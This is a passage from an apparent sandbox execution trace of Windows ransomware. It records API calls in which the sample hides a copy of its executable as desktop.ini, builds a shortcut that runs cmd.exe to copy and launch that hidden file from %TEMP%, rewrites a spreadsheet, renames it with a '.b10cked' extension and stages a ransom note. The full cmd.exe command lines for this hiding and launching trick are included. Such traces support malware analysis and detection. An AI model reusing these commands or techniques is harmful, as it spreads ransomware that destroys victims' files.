ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0132.495] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0132.495] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew") returned 0x20 [0132.496] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x13e | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\DESKTOP.INI\" && ATTRIB +H 
\"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x13e [0132.496] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0132.496] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xa70, dwThreadId=0xbf0)) returned 1 [0132.497] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0133.135] CloseHandle (hObject=0x114) returned 1 [0133.136] CloseHandle (hObject=0x110) returned 1 [0133.136] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", 
cchCount2=1) returned 2 [0133.136] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0133.136] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0133.136] GetTickCount () returned 0x2a4f5 [0133.136] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18992516470) returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x34\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x55\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x56\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0133.136] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0133.136] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0133.136] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0133.136] CharUpperBuffW (in: lpsz="explorer.exe \"2w7_ew\" & type \"2w7_ew\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5d | out: lpsz="EXPLORER.EXE \"2W7_EW\" & TYPE \"2W7_EW\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5d [0133.136] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0133.136] CharUpperBuffW (in: lpsz="explorer.exe \"2w7_ew\" & type \"2w7_ew\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5e | out: lpsz="EXPLORER.EXE \"2W7_EW\" & TYPE \"2W7_EW\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5e [0133.136] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0133.136] CoInitialize (pvReserved=0x0) returned 0x0 [0133.137] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, 
dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0133.138] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0133.138] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0133.138] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0133.139] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"2w7_ew\" & type \"2w7_ew\\desktop.ini\" > \"%TEMP%\\564nuUlV.exe\" && \"%TEMP%\\564nuUlV.exe\"") returned 0x0 [0133.139] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0133.139] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0133.140] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0133.140] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew.lnk", fRemember=0) returned 0x0 [0133.147] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0133.147] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0133.147] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0133.147] CoUninitialize () [0133.147] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.147] ReleaseMutex (hMutex=0xf8) returned 1 [0133.147] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.147] ReleaseMutex 
(hMutex=0xf8) returned 1 [0133.147] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.147] ReleaseMutex (hMutex=0xf8) returned 1 [0133.148] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0133.148] ReleaseMutex (hMutex=0xf8) returned 1 [0133.148] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\lim3lqu-k6ho.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18993709646) returned 1 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.148] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3244 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0133.149] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2d5c [0133.149] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3244 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3244 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0133.150] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0133.150] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1921, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1921, 
lpOverlapped=0x0) returned 1 [0133.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0133.151] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1921, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1921, lpOverlapped=0x0) returned 1 [0133.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6433, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1923 [0133.151] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1921, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1921, lpOverlapped=0x0) returned 1 [0133.151] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6433, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1923 [0133.151] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1921, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1921, lpOverlapped=0x0) returned 1 [0133.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lim3Lqu-K6HO.xls", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0133.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lim3Lqu-K6HO.xls", cchWideChar=16, lpMultiByteStr=0x1328834, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lim3Lqu-K6HO.xls", lpUsedDefaultChar=0x0) returned 16 [0133.155] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3244 [0133.155] WriteFile (in: hFile=0x114, 
lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0133.155] CloseHandle (hObject=0x114) returned 1 [0133.156] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS") returned 0x34 [0133.157] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0133.157] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\LIM3LQ~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\lim3Lqu-K6HO.xls.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbbc, dwThreadId=0xa38)) returned 1 [0133.159] CloseHandle (hObject=0x110) returned 1 [0133.159] CloseHandle (hObject=0x114) returned 1 [0133.159] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0133.159] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0133.159] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount2=34) returned 3 [0133.159] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0133.159] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0133.159] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0133.159] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0133.159] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0133.159] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0133.159] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0133.160] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 